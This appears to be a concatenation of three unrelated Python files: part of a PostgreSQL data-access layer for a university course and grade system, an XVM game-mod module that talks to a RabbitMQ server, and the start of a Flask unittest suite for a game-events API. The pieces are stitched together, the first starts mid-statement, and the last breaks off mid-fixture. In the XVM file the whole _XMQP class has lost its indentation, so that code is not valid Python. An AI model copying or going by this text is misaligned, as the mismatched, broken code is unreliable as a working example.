        ORDER BY \"courseID\""
        DATA = (faculty, major, year, term)
        self.query.execute(SQL, DATA)
        resultset = self.query.fetchall()
        return resultset

    def currentCourse(self, user_id):
        """Return the courses a user is enrolled in that have no grade yet."""
        SQL = "SELECT course.* FROM \"GMan\".\"data\" data,\"GMan\".course WHERE data.user_id=%s AND \
        data.grade IS NULL AND data.\"courseID\" = course.\"courseID\" ORDER BY \"data\".\"courseID\""
        DATA = (user_id,)
        self.query.execute(SQL, DATA)
        resultset = self.query.fetchall()
        return resultset

    def addCourse(self, information):
        """Create a new course from the *information* dict.

        Both "maxStud" (remaining seats) and "amt" (capacity) start at
        information["student_limit"].  Returns 1 on success, or
        (pgcode, pgerror) on an integrity or data error.
        """
        try:
            SQL = "INSERT INTO \"GMan\".course (\"courseID\", \"courseName\", \"facultyID\",\
            \"majorID\", \"professorID\", \"year\", term, \"time\", building, room, credits,\"maxStud\", pre, amt)\
            VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
            DATA = (information["courseID"], information["courseName"], information["facultyID"],
                    information["majorID"], information["lecturer"], information["year"], information["term"],
                    information["period"], information["building"], information["room"], information["credit"],
                    information["student_limit"], information["pre"], information["student_limit"])
            self.query.execute(SQL, DATA)
            self.connection.commit()
            return 1
        except psycopg2.IntegrityError as e:
            print(e.pgcode, e.pgerror)
            return (str(e.pgcode), e.pgerror)
        except psycopg2.DataError as e:
            print(e.pgcode, e.pgerror)
            return (str(e.pgcode), e.pgerror)

    def dropCourseUser(self, user_id, courseID, year_taken, limit):
        """Remove a user's enrolment row and free one seat.  Returns 1."""
        SQL = "DELETE FROM \"GMan\".\"data\" WHERE user_id=%s AND \"courseID\"=%s AND year_taken=%s"
        DATA = (user_id, courseID, year_taken)
        self.query.execute(SQL, DATA)
        self.connection.commit()
        self.increaseLimitOne(courseID, limit)
        return 1

    def addCourseUser(self, user_id, year, term, courseID, year_taken, limit):
        """Enrol a user in a course and take one seat.

        Returns 1 on success, or (pgcode, pgerror) when the user is already
        enrolled (integrity error).
        """
        try:
            SQL = "INSERT INTO \"GMan\".\"data\" (user_id, \"courseID\", year_taken, \"year\", term) \
            VALUES(%s, %s, %s, %s, %s)"
            DATA = (user_id, courseID, year_taken, year, term)
            self.query.execute(SQL, DATA)
            self.connection.commit()
            self.decreaseLimitOne(courseID, limit)
            return 1
        except psycopg2.IntegrityError as e:
            print(e.pgcode, e.pgerror)
            return (str(e.pgcode), e.pgerror)

    def increaseLimitOne(self, courseID, oldLimit):
        """Set the course's remaining-seat counter to oldLimit + 1."""
        SQL = "UPDATE \"GMan\".course SET \"maxStud\"=%s WHERE \"courseID\"=%s"
        DATA = (oldLimit + 1, courseID)
        self.query.execute(SQL, DATA)
        self.connection.commit()

    def decreaseLimitOne(self, courseID, oldLimit):
        """Set the course's remaining-seat counter to oldLimit - 1."""
        SQL = "UPDATE \"GMan\".course SET \"maxStud\"=%s WHERE \"courseID\"=%s"
        DATA = (oldLimit - 1, courseID)
        self.query.execute(SQL, DATA)
        self.connection.commit()

    def allUserCourse(self, user_id):
        """Return every enrolment row (past and present) for a user."""
        SQL = "SELECT * FROM \"GMan\".\"data\" WHERE user_id=%s ORDER BY \"courseID\""
        DATA = (user_id,)
        self.query.execute(SQL, DATA)
        resultset = self.query.fetchall()
        return resultset

    def getAllCourseINFO(self):
        """Return every course row, ordered by course id."""
        SQL = "SELECT * FROM \"GMan\".\"course\" ORDER BY \"courseID\""
        self.query.execute(SQL)
        resultset = self.query.fetchall()
        return resultset

    def findProfessorbyCourseID(self, courseID):
        """Return the professor row teaching *courseID*, or None."""
        SQL = "SELECT \"professorID\" FROM \"GMan\".\"course\" WHERE \"courseID\" = %s"
        DATA = (courseID,)
        self.query.execute(SQL, DATA)
        resultset = self.query.fetchone()
        # `is not None` is the correct identity test (was `!= None`).
        if resultset is not None:
            SQL = "SELECT * FROM \"GMan\".professor WHERE user_id = %s"
            DATA = (resultset.professorID,)
            self.query.execute(SQL, DATA)
            resultset = self.query.fetchone()
            return resultset
        return None

    def getCoursebyID(self, courseID):
        """Return the course row for *courseID* (or None)."""
        SQL = "SELECT * FROM \"GMan\".\"course\" WHERE \"courseID\" = %s"
        DATA = (courseID,)
        self.query.execute(SQL, DATA)
        resultset = self.query.fetchone()
        return resultset

    def setProfessor(self, courseID, professorID):
        """Assign a professor to a course.  Returns 1 on success, 0 when the
        professor id violates the foreign-key constraint."""
        try:
            SQL = "UPDATE \"GMan\".course SET \"professorID\"=%s WHERE \"courseID\"=%s"
            DATA = (professorID, courseID)
            self.query.execute(SQL, DATA)
            self.connection.commit()
            return 1
        except psycopg2.IntegrityError:
            return 0
class databaseGrade(database):
    """Database access for reading transcripts and writing grades."""

    def _coursesFor(self, rows):
        # Look up the course row for each enrolment row, preserving order.
        courses = []
        for row in rows:
            SQL = "SELECT * FROM \"GMan\".course WHERE \"courseID\"=%s"
            DATA = (row.courseID,)
            self.query.execute(SQL, DATA)
            courses.append(self.query.fetchone())
        return courses

    def getPastCourse(self, user_id):
        """Return (data_rows, course_rows) for every graded course of a user."""
        SQL = "SELECT * FROM \"GMan\".\"data\" WHERE user_id=%s AND grade IS NOT NULL ORDER BY \"year\", term"
        DATA = (user_id,)
        self.query.execute(SQL, DATA)
        resultsetData = self.query.fetchall()
        return resultsetData, self._coursesFor(resultsetData)

    def getCurrentCourse(self, user_id, year, term):
        """Return (data_rows, course_rows) for a user's courses in one term."""
        SQL = "SELECT * FROM \"GMan\".\"data\" WHERE user_id=%s AND \"year\"=%s AND term =%s ORDER BY \"courseID\""
        DATA = (user_id, year, term)
        self.query.execute(SQL, DATA)
        resultsetData = self.query.fetchall()
        return resultsetData, self._coursesFor(resultsetData)

    def updateDataStudent(self, id, status, gpa):
        """Persist a student's recomputed GPA and status."""
        SQL = "UPDATE \"GMan\".student SET gpa=%s, status =%s WHERE \"user_id\"=%s"
        DATA = (gpa, status, id)
        self.query.execute(SQL, DATA)
        self.connection.commit()

    def getAllUserCourse(self, courseID, year):
        """Return every enrolment row of a course for the given year."""
        SQL = "SELECT * FROM \"GMan\".\"data\" WHERE \"courseID\" = %s AND year_taken = %s ORDER BY user_id"
        DATA = (courseID, year)
        self.query.execute(SQL, DATA)
        return self.query.fetchall()

    def getUserData(self, userID):
        """Map each row's user_id to the student's full name."""
        names = {}
        for row in userID:
            SQL = "SELECT user_id, \"name\", surname FROM \"GMan\".student WHERE \"user_id\" = %s"
            DATA = (row.user_id,)
            self.query.execute(SQL, DATA)
            student = self.query.fetchone()
            names[row.user_id] = student.name + " " + student.surname
        return names

    def updateUserGrade(self, data, courseID, year):
        """Write grades for a course.

        Each item in *data* is (user_id, grade).  allowRepeat is 2 for an F,
        1 for D/D+, otherwise 0.  Returns 0 at the first malformed item
        (earlier writes are already committed), else 1.
        """
        for entry in data:
            if len(entry) < 2:
                return 0
            grade = entry[1]
            if grade == "F":
                repeat = 2
            elif grade in ("D+", "D"):
                repeat = 1
            else:
                repeat = 0
            SQL = "UPDATE \"GMan\".\"data\" SET grade=%s, \"allowRepeat\"=%s WHERE user_id=%s AND \"courseID\"=%s AND year_taken=%s"
            DATA = (grade, repeat, entry[0], courseID, year)
            self.query.execute(SQL, DATA)
            self.connection.commit()
        return 1
class databaseAdmin(database):
    """Database access for administrative maintenance (term rollover,
    faculty/major management)."""

    def incrementData(self):
        """Advance the academic calendar by one term.

        Flips every student's term (1 <-> 2), resets each course's remaining
        seats ("maxStud") back to its capacity ("amt"), then shifts every
        student's year up by one (10 <- 9, 9 <- 8, ..., 1 <- 0), committing
        after each statement.  Returns 1.

        NOTE(review): the year shift runs on every call, not only at the
        term-2 -> term-1 rollover -- confirm this is intended.
        """
        temp = 10
        # The current term is read from an arbitrary student row.
        SQL = "SELECT term FROM \"GMan\".student"
        self.query.execute(SQL)
        resultset = self.query.fetchone()
        term = resultset.term
        # elif: the two branches are mutually exclusive; the original's
        # second plain `if` could never fire after the first anyway.
        if term == 1:
            SQL = "UPDATE \"GMan\".student SET term=2 WHERE term = 1"
            self.query.execute(SQL)
            self.connection.commit()
            SQL = "UPDATE \"GMan\".course SET \"maxStud\" = amt"
            self.query.execute(SQL)
            self.connection.commit()
        elif term == 2:
            SQL = "UPDATE \"GMan\".student SET term=1 WHERE term = 2"
            self.query.execute(SQL)
            self.connection.commit()
            SQL = "UPDATE \"GMan\".course SET \"maxStud\" = amt"
            self.query.execute(SQL)
            self.connection.commit()
        # Shift years from the top down so no row is bumped twice.
        # (Removed a leftover debug print of each statement.)
        for i in range(10, 0, -1):
            SQL = "UPDATE \"GMan\".student SET \"year\"=%s WHERE \"year\" = %s"
            DATA = (str(temp), str(temp - 1))
            self.query.execute(SQL, DATA)
            self.connection.commit()
            temp = temp - 1
        return 1

    def getallMajors(self, faculty_id):
        """Return (major_rows, student_counts) for a faculty.

        Also refreshes each major's cached "studentAmt" column whenever the
        real count disagrees with it.
        """
        SQL = "SELECT * FROM \"GMan\".majors WHERE \"facultyID\"=%s ORDER BY \"majorID\""
        DATA = (faculty_id,)
        self.query.execute(SQL, DATA)
        resultsetData = self.query.fetchall()
        resultsetAmt = []
        for elements in resultsetData:
            SQL = "SELECT count(*) FROM \"GMan\".student WHERE \"majorID\"=%s"
            DATA = (elements.majorID,)
            self.query.execute(SQL, DATA)
            amt = self.query.fetchone()
            resultsetAmt.append(amt.count)
            if amt.count != elements.studentAmt:
                # Cached count is stale -- write the real one back.
                SQL = "UPDATE \"GMan\".majors SET \"studentAmt\"=%s WHERE \"majorID\"=%s"
                DATA = (amt.count, elements.majorID)
                self.query.execute(SQL, DATA)
                self.connection.commit()
        return resultsetData, resultsetAmt

    def addMajors(self, faculty_id, major_id, degree):
        """Create a new major with zero students.

        Returns 1 on success, or "DUPLICATE" when the major already exists.
        """
        try:
            SQL = "INSERT INTO \"GMan\".majors (\"majorID\", \"facultyID\", \"degree\", \"studentAmt\") VALUES(%s, %s, %s, 0)"
            DATA = (major_id, faculty_id, degree)
            self.query.execute(SQL, DATA)
            self.connection.commit()
            return 1
        except psycopg2.IntegrityError:
            return "DUPLICATE"

    def getallFaculty(self):
        """Return (faculty_rows, student_counts) for every faculty.

        Also refreshes each faculty's cached "studentAmt" column whenever the
        real count disagrees with it.
        """
        SQL = "SELECT * FROM \"GMan\".faculty ORDER BY \"facultyID\""
        self.query.execute(SQL)
        resultsetData = self.query.fetchall()
        resultsetAmt = []
        for elements in resultsetData:
            SQL = "SELECT count(*) FROM \"GMan\".student WHERE \"facultyID\"=%s"
            DATA = (elements.facultyID,)
            self.query.execute(SQL, DATA)
            amt = self.query.fetchone()
            resultsetAmt.append(amt.count)
            if amt.count != elements.studentAmt:
                # Cached count is stale -- write the real one back.
                SQL = "UPDATE \"GMan\".faculty SET \"studentAmt\"=%s WHERE \"facultyID\"=%s"
                DATA = (amt.count, elements.facultyID)
                self.query.execute(SQL, DATA)
                self.connection.commit()
        return resultsetData, resultsetAmt

    def addFaculty(self, faculty_id, faculty_name):
        """Create a new faculty with zero users and students.

        Returns 1 on success, or "DUPLICATE" when the faculty already exists.
        """
        try:
            SQL = "INSERT INTO \"GMan\".faculty (\"facultyID\", \"facultyName\", \"userAmt\", \"studentAmt\") VALUES(%s, %s, 0, 0)"
            DATA = (faculty_id, faculty_name)
            self.query.execute(SQL, DATA)
            self.connection.commit()
            return 1
        except psycopg2.IntegrityError:
            return "DUPLICATE"
class databaseMessage(database):
    """Database access for user-to-user messages."""

    def getMessage(self, userID):
        """Return every not-yet-dismissed message addressed to *userID*."""
        statement = "SELECT * FROM \"GMan\".message WHERE \"toUser\" = %s AND dismiss = '0'"
        self.query.execute(statement, (userID,))
        return self.query.fetchall()

    def dismissMessage(self, userID):
        """Mark every message addressed to *userID* as dismissed."""
        statement = "UPDATE \"GMan\".message SET dismiss='1' WHERE \"toUser\"=%s"
        self.query.execute(statement, (userID,))
        self.connection.commit()

    def sendMessage(self, toUser, fromUser, message, time):
        """Insert a new, undismissed message.

        Returns 1 on success, 0 on an integrity error.
        """
        try:
            statement = "INSERT INTO \"GMan\".message (\"fromUser\", \"toUser\", message, \"time\", dismiss) VALUES(%s, %s, %s, %s, '0')"
            self.query.execute(statement, (fromUser, toUser, message, time))
            self.connection.commit()
            return 1
        except psycopg2.IntegrityError:
            return 0
|
|
""" XVM (c) www.modxvm.com 2013-2017 """
__all__ = ['start', 'stop', 'call']
# PUBLIC
import os
import threading
import simplejson
import traceback
import uuid
import BigWorld
from gui.shared import g_eventBus, events
import pika
from pika import exceptions as pika_exceptions
from xfw import *
from xvm_main.python.logger import *
import xvm_main.python.config as config
import xvm_main.python.minimap_circles as minimap_circles
import xvm_main.python.utils as utils
from xvm_main.python.consts import *
from xvm_main.python.xvm import g_xvm
from consts import *
XMQP_DEVELOPMENT = os.environ.get('XMQP_DEVELOPMENT') == '1'
_xmqp = None
_xmqp_thread = None
def is_active():
    """Return True when the XMQP thread exists and its consumer is running.

    Wrapped in bool() so callers always get True/False instead of the
    original's None / Thread-object truthy values.
    """
    global _xmqp_thread, _xmqp
    return bool(_xmqp_thread and _xmqp.is_consuming)
def start():
    # One-shot arena hook: unsubscribe first so a repeated
    # onNewVehicleListReceived does not start XMQP twice, then defer the
    # real startup (_start) to the next BigWorld tick.
    BigWorld.player().arena.onNewVehicleListReceived -= start
    BigWorld.callback(0, _start)
def _start(e=None):
    # Deferred starter: waits (via the event bus) until XVM services are
    # initialized, then collects the ally team's accountDBIDs and spins up
    # the XMQP consumer thread.
    g_eventBus.removeListener(XVM_EVENT.XVM_SERVICES_INITIALIZED, _start)
    if not g_xvm.xvmServicesInitialized:
        # Not ready yet - re-subscribe and retry when services come up.
        g_eventBus.addListener(XVM_EVENT.XVM_SERVICES_INITIALIZED, _start)
        return
    # XMQP is only used for live battles (not replays), unless forced on
    # via the XMQP_DEVELOPMENT environment flag.
    if (config.networkServicesSettings.xmqp and not isReplay()) or XMQP_DEVELOPMENT:
        token = config.token.token
        if token:
            players = []
            player = BigWorld.player()
            for (vehicleID, vData) in player.arena.vehicles.iteritems():
                # ally team only
                if vData['team'] == player.team:
                    players.append(vData['accountDBID'])
            if XMQP_DEVELOPMENT:
                # In development the own account may be missing from the
                # vehicle list; make sure it is announced too.
                accountDBID = utils.getAccountDBID()
                if accountDBID not in players:
                    players.append(accountDBID)
                #players.append(42)
                #players.append(43)
            # start
            stop()
            global _xmqp_thread, _xmqp
            _xmqp = _XMQP(players)
            _xmqp_thread = threading.Thread(target=_xmqp.start, name='xmqp')
            # Daemon thread: must not block client shutdown.
            _xmqp_thread.setDaemon(True)
            _xmqp_thread.start()
            debug('[XMQP] Thread started')
def stop():
    # Stop the consumer and join its thread; safe to call when nothing is
    # running (both globals are then simply reset to None).
    global _xmqp_thread, _xmqp
    if _xmqp_thread:
        _xmqp.stop()
        # Wait for the consumer thread to finish before forgetting it.
        _xmqp_thread.join()
        _xmqp_thread = None
        debug('[XMQP] Thread stopped')
    _xmqp = None
def call(message):
    """Forward *message* to the active XMQP consumer; no-op when stopped."""
    global _xmqp
    xmqp = _xmqp
    if xmqp is not None:
        xmqp.call(message)
def getCapabilitiesData():
    """Collect this client's capabilities to announce to teammates.

    Returns an empty dict when no minimap-circles data is available.
    """
    mcdata = minimap_circles.getMinimapCirclesData()
    if not mcdata:
        return {}
    #capabilities['sixthSense'] = True # for debug
    return {'sixthSense': mcdata.get('commander_sixthSense', None)}
players_capabilities = {}
# PRIVATE
class _XMQP(object):
"""This is an xmqp consumer that will handle unexpected interactions
with RabbitMQ such as channel and connection closures.
If RabbitMQ closes the connection, it will reopen it. You should
look at the output, as there are limited reasons why the connection may
be closed, which usually are tied to permission related issues or
socket timeouts.
If the channel is closed, it will indicate a problem with one of the
commands that were issued and that should surface in the output as well.
"""
def __init__(self, players):
"""Create a new instance of the consumer class, passing in the AMQP
URL used to connect to RabbitMQ.
"""
self._players = players
self._consuming = False
self._closing = False
self._connection = None
self._channel = None
self._consumer_tag = None
self._exchange_name = None
self._queue_name = None
#self._correlation_id = None
self._exchange_correlation_id = None
self._reconnect_attempts = 0
global players_capabilities
players_capabilities = {}
@property
def is_consuming(self):
return self._consuming
def start(self):
"""Run the xmqp consumer by connecting to RabbitMQ and then
starting the IOLoop to block and allow the SelectConnection to operate.
"""
debug('[XMQP] Starting')
self._connection = self.connect()
self.start_ioloop()
def stop(self):
"""Cleanly shutdown the connection to RabbitMQ by stopping the consumer
with RabbitMQ. When RabbitMQ confirms the cancellation, on_cancelok
will be invoked by pika, which will then closing the channel and
connection. The IOLoop is started again because this method is invoked
when CTRL-C is pressed raising a KeyboardInterrupt exception. This
exception stops the IOLoop which needs to be running for pika to
communicate with RabbitMQ. All of the commands issued prior to starting
the IOLoop will be buffered but not processed.
"""
try:
debug('[XMQP] Stopping')
self._connection.ioloop.stop()
if self.is_consuming:
self.stop_consuming()
if self._channel and self._channel.is_open:
self.close_channel()
if self._connection and self._connection.is_open:
self.close_connection()
self._connection.ioloop.stop()
debug('[XMQP] Stopped')
except (pika_exceptions.ChannelClosed, pika_exceptions.ConnectionClosed):
debug(traceback.format_exc())
except Exception as ex:
err(traceback.format_exc())
def call(self, data):
if self.is_consuming and self._exchange_name is not None:
try:
#self._correlation_id = str(uuid.uuid4())
message = simplejson.dumps({'accountDBID': utils.getAccountDBID(), 'data': data})
debug('[XMQP] call: %s' % utils.hide_guid(message))
self._channel.basic_publish(
exchange=self._exchange_name,
routing_key='',
#properties=pika.BasicProperties(
# reply_to=self._queue_name,
# correlation_id=self._correlation_id),
body=message)
except Exception as ex:
err('_exchange_name=' + str(self._exchange_name))
err(traceback.format_exc())
# INTERNAL
def on_message(self, unused_channel, basic_deliver, properties, body):
"""Invoked by pika when a message is delivered from RabbitMQ. The
channel is passed for your convenience. The basic_deliver object that
is passed in carries the exchange, delivery tag and a redelivered flag
for the message. The properties passed in is an instance of
BasicProperties with the message properties and the body is the
message that was sent.
:param pika.channel.Channel unused_channel: The channel object
:param pika.Spec.Basic.Deliver: basic_deliver method
:param pika.Spec.BasicProperties: properties
:param str|unicode body: The message body
"""
if self._closing:
return
try:
#debug('[XMQP] Received message #%s: %s' % (basic_deliver.delivery_tag, body))
debug('[XMQP] recv: %s' % body)
#debug(basic_deliver)
#if body != 'ok':
# debug('[XMQP] Received message #%s: %s' % (basic_deliver.delivery_tag, body))
if self._exchange_correlation_id == properties.correlation_id:
response = simplejson.loads(body)
if 'exchange' in response:
self._exchange_name = response['exchange']
global players_capabilities
for accountDBID, data in response['users'].iteritems():
players_capabilities[int(accountDBID)] = simplejson.loads(data) if data else {}
self.bind_channel()
else:
log("[XMQP] ERROR: response='{}'".format(body))
self.stop()
else:
#elif basic_deliver.exchange:
#debug('[XMQP] recv: {} {}'.format(properties.headers.get('userId', None), body))
response = simplejson.loads(body)
g_eventBus.handleEvent(events.HasCtxEvent(XVM_BATTLE_EVENT.XMQP_MESSAGE, response))
except Exception as ex:
err(traceback.format_exc())
def start_ioloop(self):
try:
self._connection.ioloop.start()
except Exception as ex:
err(traceback.format_exc())
def connect(self):
"""This method connects to RabbitMQ, returning the connection handle.
When the connection is established, the on_connection_open method
will be invoked by pika.
:rtype: pika.SelectConnection
"""
debug('[XMQP] Connecting')
credentials = pika.PlainCredentials('xvm', 'xvm')
params = pika.ConnectionParameters(
host=XVM.XMQP_SERVER,
#port=XVM.XMQP_SERVER_PORT,
virtual_host='xvm',
credentials=credentials,
#channel_max=None,
#frame_max=None,
#heartbeat=None,
#ssl=None,
#ssl_options=None,
connection_attempts=3,
retry_delay=3,
socket_timeout=1,
#locale=None,
#backpressure_detection=None,
blocked_connection_timeout=5)
#client_properties=_DEFAULT)
return pika.SelectConnection(
params,
on_open_error_callback=self.on_open_connection_error,
on_open_callback=self.on_connection_open,
stop_ioloop_on_close=False)
def on_open_connection_error(self, unused_connection, error_message=None):
err('[XMQP] on_open_connection_error %s' % repr(pika_exceptions.AMQPConnectionError(error_message or
self._connection.params.connection_attempts)))
self._connection.ioloop.stop()
def on_connection_open(self, unused_connection):
"""This method is called by pika once the connection to RabbitMQ has
been established. It passes the handle to the connection object in
case we need it, but in this case, we'll just mark it unused.
:type unused_connection: pika.SelectConnection
"""
debug('[XMQP] Connection opened')
self.add_on_connection_close_callback()
self.open_channel()
def on_connection_closed(self, connection, reply_code, reply_text):
"""This method is invoked by pika when the connection to RabbitMQ is
closed unexpectedly. Since it is unexpected, we will reconnect to
RabbitMQ if it disconnects.
:param pika.connection.Connection connection: The closed connection obj
:param int reply_code: The server provided reply_code if given
:param str reply_text: The server provided reply_text if given
"""
self._consuming = False
self._channel = None
if self._closing:
self._connection.ioloop.stop()
elif self._reconnect_attempts >= 3:
debug('[XMQP] Connection closed, maximum reopen attempts reached')
self._connection.ioloop.stop()
else:
debug('[XMQP] Connection closed, reopening in 5 seconds: (%s) %s' % (reply_code, reply_text))
self._connection.add_timeout(5, self.reconnect)
def reconnect(self):
"""Will be invoked by the IOLoop timer if the connection is
closed. See the on_connection_closed method.
"""
debug('[XMQP] Reconnecting')
# This is the old connection IOLoop instance, stop its ioloop
self._connection.ioloop.stop()
if not self._closing:
self._reconnect_attempts += 1
self._connection = self.connect()
self.start_ioloop()
def open_channel(self):
"""Open a new channel with RabbitMQ by issuing the Channel.Open RPC
command. When RabbitMQ responds that the channel is open, the
on_channel_open callback will be invoked by pika.
"""
debug('[XMQP] Creating a new channel')
self._connection.channel(on_open_callback=self.on_channel_open)
def on_channel_open(self, channel):
"""This method is invoked by pika when the channel has been opened.
The channel object is passed in so we can make use of it.
Since the channel is now open, we'll declare the exchange to use.
:param pika.channel.Channel channel: The channel object
"""
if self._closing:
return
debug('[XMQP] Channel opened')
self._channel = channel
self.add_on_channel_close_callback()
self.setup_queue()
def setup_queue(self):
"""Setup the queue on RabbitMQ by invoking the Queue.Declare RPC
command. When it is complete, the on_queue_declareok method will
be invoked by pika.
"""
debug('[XMQP] Declaring queue')
self._channel.queue_declare(self.on_queue_declareok, exclusive=True)
def on_queue_declareok(self, method_frame):
"""Method invoked by pika when the Queue.Declare RPC call made in
setup_queue has completed. In this method we will bind the queue
and exchange by issuing the Queue.Bind RPC command.
When this command is complete, the on_bindok method will
be invoked by pika.
:param pika.frame.Method method_frame: The Queue.DeclareOk frame
"""
if self._closing:
return
self._queue_name = method_frame.method.queue
debug('[XMQP] queue: %s' % (self._queue_name))
self.start_consuming()
self.get_exchange_name()
def start_consuming(self):
"""This method sets up the consumer by first calling
add_on_cancel_callback so that the object is notified if RabbitMQ
cancels the consumer. It then issues the Basic.Consume RPC command
which returns the consumer tag that is used to uniquely identify the
consumer with RabbitMQ. We keep the value to use it when we want to
cancel consuming. The on_message method is passed in as a callback pika
will invoke when a message is fully received.
"""
debug('[XMQP] Issuing consumer related RPC commands')
self._consuming = True
self.add_on_cancel_callback()
self._consumer_tag = self._channel.basic_consume(self.on_message, self._queue_name, no_ack=True)
def get_exchange_name(self):
debug('[XMQP] Getting exchange name')
self._exchange_correlation_id = str(uuid.uuid4())
message = simplejson.dumps({
'token': config.token.token,
'players': self._players,
'capabilities': simplejson.dumps(getCapabilitiesData())})
debug('[XMQP] %s' % utils.hide_guid(message))
self._channel.basic_publish(
exchange=XVM.XMQP_LOBBY_EXCHANGE,
routing_key=XVM.XMQP_LOBBY_ROUTING_KEY,
properties=pika.BasicProperties(
reply_to=self._queue_name,
correlation_id=self._exchange_correlation_id,
),
body=message)
def bind_channel(self):
debug('[XMQP] Binding %s to %s' % (self._exchange_name, self._queue_name))
self._channel.queue_bind(self.on_bindok, self._queue_name, self._exchange_name)
def on_bindok(self, unused_frame):
"""Invoked by pika when the Queue.Bind method has completed. At this
point we will start consuming messages by calling start_consuming
which will invoke the needed RPC commands to start the process.
:param pika.frame.Method unused_frame: The Queue.BindOk response frame
"""
debug('[XMQP] Queue bound')
self._reconnect_attempts = 0
g_eventBus.handleEvent(events.HasCtxEvent(XVM_BATTLE_EVENT.XMQP_CONNECTED))
# service methods
def add_on_connection_close_callback(self):
"""This method adds an on close callback that will be invoked by pika
when RabbitMQ closes the connection to the publisher unexpectedly.
"""
debug('[XMQP] Adding connection close callback')
self._connection.add_on_close_callback(self.on_connection_closed)
def add_on_channel_close_callback(self):
"""This method tells pika to call the on_channel_closed method if
RabbitMQ unexpectedly closes the channel.
"""
debug('[XMQP] Adding channel close callback')
self._channel.add_on_close_callback(self.on_channel_closed)
def on_channel_closed(self, channel, reply_code, reply_text):
"""Invoked by pika when RabbitMQ unexpectedly closes the channel.
Channels are usually closed if you attempt to do something that
violates the protocol, such as re-declare an exchange or queue with
different parameters. In this case, we'll close the connection
to shutdown the object.
:param pika.channel.Channel: The closed channel
:param int reply_code: The numeric reason the channel was closed
:param str reply_text: The text reason the channel was closed
"""
debug('[XMQP] Channel %i was closed: (%s) %s' % (channel, reply_code, reply_text))
self._connection.close()
def add_on_cancel_callback(self):
    """Register on_consumer_cancelled to run if RabbitMQ cancels the consumer
    on its own (e.g. the queue is deleted).
    """
    debug('[XMQP] Adding consumer cancellation callback')
    self._channel.add_on_cancel_callback(self.on_consumer_cancelled)
def on_consumer_cancelled(self, method_frame):
    """Basic.Cancel handler: the broker cancelled our consumer remotely.

    :param pika.frame.Method method_frame: The Basic.Cancel frame
    """
    debug('[XMQP] Consumer was cancelled remotely, shutting down: %r' % (method_frame))
    if not self._channel:
        return
    self._channel.close()
def stop_consuming(self):
    """Ask RabbitMQ to stop delivering messages via a Basic.Cancel RPC."""
    self._consuming = False
    self._closing = True
    if not self._channel:
        return
    debug('[XMQP] Sending a Basic.Cancel RPC command to RabbitMQ')
    self._channel.basic_cancel(self.on_cancelok, self._consumer_tag)
def on_cancelok(self, unused_frame):
    """Basic.CancelOk handler: the broker confirmed the consumer cancellation.

    Closing the channel from here triggers on_channel_closed, which in turn
    closes the connection.

    :param pika.frame.Method unused_frame: The Basic.CancelOk frame
    """
    debug('[XMQP] RabbitMQ acknowledged the cancellation of the consumer')
    self.close_channel()
def close_channel(self):
    """Close the channel and mark the client as shutting down."""
    debug('[XMQP] Closing the channel')
    self._consuming = False
    self._closing = True
    channel = self._channel
    if channel is not None:
        channel.close()
def close_connection(self):
    """Tear down the RabbitMQ connection and flag the client as closing."""
    self._consuming = False
    self._closing = True
    debug('[XMQP] Closing connection')
    self._connection.close()
|
|
import unittest
import time
import datetime
import json
import sys
#import base64
#from werkzeug.wrappers import Response
sys.path.append("..")
#from flask import current_app
#from werkzeug.datastructures import Headers
from gameevents_app import create_app
#Extensions
from gameevents_app.extensions import db, LOG
from gameevents_app.models.session import Session
from gameevents_app.models.client import Client
from gameevents_app.models.gameevent import GameEvent
from uuid import UUID
import OpenSSL
#from gameevents_app.errors import InvalidGamingSession
#from sqlalchemy.orm.exc import NoResultFound
#from flask.ext.api.exceptions import AuthenticationFailed
class TestGameEvents(unittest.TestCase):
    """Integration tests for the gameevents REST API.

    setUpClass builds a throwaway database containing two clients (a normal
    one and an admin "dashboard" one), two known sessions, and a collection
    of auth tokens (valid, expired, malformed). The individual tests exercise
    the token, events, clients, and sessions endpoints through the Flask test
    client and assert on the HTTP status line.
    """

    @classmethod
    def setUpClass(cls):
        cls.app = create_app(testing=True)
        cls.app_context = cls.app.app_context()
        cls.app_context.push()
        cls.client = cls.app.test_client()
        LOG.info("Initializing tests.")
        # Create a brand new test db
        db.create_all()
        # Add one normal client and one admin client
        new_client = Client("myclientid", "myapikey", "normal")
        new_admin_client = Client("dashboard", "dashboardapikey", "admin")
        db.session.add(new_client)
        db.session.add(new_admin_client)
        try:
            db.session.commit()
            LOG.info("=== Added clients ===")
        except Exception as e:
            LOG.error(e, exc_info=True)
        # Generate gaming session ids
        cls.newsessionid = UUID(bytes=OpenSSL.rand.bytes(16)).hex
        cls.newsessionid2 = UUID(bytes=OpenSSL.rand.bytes(16)).hex
        cls.newsessionid3 = UUID(bytes=OpenSSL.rand.bytes(16)).hex  # session not in db
        cls.unauthorized_sessionid = "ac52bb1d811356ab3a8e8711c5f7ac5d"
        new_session = Session(cls.newsessionid, new_client.id)
        new_session2 = Session(cls.newsessionid2, new_client.id)
        db.session.add(new_session)
        db.session.add(new_session2)
        try:
            db.session.commit()
            LOG.info("=== Added sessions ===")
            LOG.info("=== Session not in db: %s ===" % cls.newsessionid3)
        except Exception as e:
            LOG.error(e, exc_info=True)
        # Generate tokens; expiration=1 tokens are expired by the sleep below.
        cls.mytoken = new_client.generate_auth_token(cls.newsessionid)
        cls.myexpiredtoken = new_client.generate_auth_token(cls.newsessionid, expiration=1)
        cls.mytokennewsession = new_client.generate_auth_token(cls.newsessionid3)
        cls.myadmintoken = new_admin_client.generate_auth_token()
        cls.myexpiredadmintoken = new_admin_client.generate_auth_token(expiration=1)
        cls.mybadtoken = "badlogin" + cls.mytoken.decode()[8:]
        cls.mybadtoken = cls.mybadtoken.encode("ascii")
        # Event fixtures (valid/invalid, single/multiple, XML/JSON)
        cls.xml_valid_event = """<event><timestamp>2015-11-29T12:10:57Z</timestamp>
        <action>STARTGAME</action><level></level><update></update><which_lix>
        </which_lix><result></result></event>"""
        cls.json_valid_event = """[{
            "timestamp": "2015-11-29T12:10:57Z",
            "action": "STARTGAME",
            "which_lix": ""
        }]"""
        cls.xml_invalid_event = """<event>a
        <action>STARTGAME</action>
        <timestamp>2015-11-29T12:10:57Z</timestamp>
        <which_lix />
        </event>"""
        cls.json_invalid_event = """
            "timestamp": "2015-11-29T12:10:57Z",
            "action": "STARTGAME",,
            "which_lix": ""
        """
        cls.xml_multiple_events = """<event>
        <action>STARTGAME</action>
        <timestamp>2015-11-29T12:10:57Z</timestamp>
        <which_lix />
        </event>
        <event>
        <action>ENDGAME</action>
